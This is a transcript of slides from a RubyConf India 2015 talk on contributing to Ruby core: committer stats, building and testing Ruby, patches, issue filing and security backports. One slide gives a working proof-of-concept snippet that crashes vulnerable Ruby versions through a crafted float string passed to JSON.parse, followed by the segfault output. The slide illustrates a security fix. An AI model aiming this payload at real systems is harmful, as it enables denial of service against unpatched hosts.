Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Ruby & You - RubyConf India 2015

hone
April 05, 2015

Ruby & You - RubyConf India 2015

hone

April 05, 2015
Tweet

More Decks by hone

Other Decks in Programming

Transcript

  1. whatever styling you define in your shadow dom is not

    affected by any outside styling. Goodbye iframes.
  2. Top 5 Committers $ git shortlog -s --since=2012 | sort

    -rn | \ head -6 2739 nobu <--- 867 akr 710 svn 635 ko1 596 naruse 448 zzak
  3. Top 5 (Human) Committers $ git shortlog -s --since=2012 |

    sort -rn | \ head -6 2739 nobu 867 akr 710 svn <--- 635 ko1 596 naruse 448 zzak
  4. Top 5 (Human) Committers $ git shortlog -s --since=2012 |

    sort -rn | \ head -6 2739 nobu 867 akr 710 svn 635 ko1 596 naruse 448 zzak <---
  5. Metasploit def digit_pattern @digit_pattern ||= rand(10_000).to_s end def multiplier (500_000

    * (1.0/digit_pattern.size)).to_i end def evil_float_string [digit_pattern, digit_pattern * multiplier].join('.') end JSON.parse("[#{evil_float_string}]")
  6. $ ruby repro.rb [BUG] Segmentation fault ruby 2.0.0p247 (2013-06-27 revision

    41674) [x86_64-linux] -- C level backtrace information ---------------------- /../lib/libruby.so.2.0(+0x1ceaa8) [0x7f8787802aa8] /../rubies/ruby-2.0.0-p247/lib/libruby.so.2.0(+0x74e0a) /../lib/libruby.so.2.0(rb_bug+0xb3) [0x7f87876a9af3] /../lib/libruby.so.2.0(+0x14cf66) [0x7f8787780f66]
  7. Affected Versions • Ruby 1.8 after 1.8.6p230 • Ruby 1.9

    prior to 1.9.3p484 • Ruby 2.0 prior to 2.0.0p353 • Ruby 2.1 prior to 2.1.0 preview2 • trunk prior to revision 43780
  8. Solution... All users are recommended to upgrade to • Ruby

    1.9.3p484 • Ruby 2.0.0p353 • Ruby 2.1.0 preview2
  9. What about Ruby 1.8.7? Please note that Ruby 1.8 series

    or any earlier releases are already obsoleted. There is no plan to release new FIXED versions for them.
  10. A Patch in Time Heroku releases two unofficial rubies: 1.

    Ruby 1.9.2p321 2. Ruby 1.8.7p375 github.com/heroku/ruby
  11. To: [email protected], [email protected], [email protected], [email protected], [email protected] At Heroku, we’re still

    maintaining security fixes for customers on 1.8.7 and 1.9.2 while we figure out our end of life process. After discussion on the security list, I’d like to apply these patches to the proper branches upstream so things don’t get out of sync. Here are the commits I’d like to apply: https://github.com/ruby/ruby/pull/457 https://github.com/ruby/ruby/pull/458 -Terence
  12. Getting on Core • Send enough patches • port Ruby

    to non-POSIX platforms • write library brought into stdlib • security backporting
  13. Getting the Source (SVN) Trunk: $ svn co http://svn.ruby-lang.org/repos/ruby/trunk ruby

    Branch: $ svn co \ http://svn.ruby-lang. org/repos/ruby/branches/ruby_2_0_0
  14. Getting the Source (git-svn) $ git clone \ git://github.com/ruby/ruby. git

    $ cd ruby $ git svn init \ svn+ssh://[email protected] lang.org/ruby/trunk $ mv .git/refs/remotes/origin/trunk \ . git/refs/remotes/git-svn $ git svn rebase
  15. Top 5 (Human) Committers $ git shortlog -s --since=2012 |

    sort -rn | \ head -6 2739 nobu 867 akr 710 svn <--- 635 ko1 596 naruse 448 zzak
  16. Running Tests $ mkdir build $ autoconf $ cd build

    $ ./configure --prefix=~/tmp/xxx --enable-shared \ --with-openssl-dir=/path/to/openssl \ --with-readline-dir=/path/to/readline \ --with-zlib-dir=/path/to/zlib $ make test-all TESTS=-v
  17. Creating a Patch $ diff -pu original/ changed/ \ >

    ruby-changes.patch $ svn diff > ruby-changes.patch $ git diff > ruby-changes.patch
  18. Filing Issues • Bugs are fixed on trunk first •

    Can request backport once committed to trunk • bugs.ruby-lang.org/projects/ruby-trunk/issues/new
  19. Story: Insecure SSL Defaults • Ruby get it’s default from

    OpenSSL • Who’s responsibility is it?
  20. Ruby Core Developer Meetings • Draft an agenda • Pick

    a date (estimate) • Ask Matz • Ask ruby-core
  21. Moving to Git • Backport Tools • Redmine • Version

    Log • Others? • Convince Core • Profit…?
  22. Why Not Static Typing? • It works™ without it •

    It is against duck typing • It will be optional
  23. Why Not Static Typing? • It works™ without it •

    It is against duck typing • It will be optional • DRY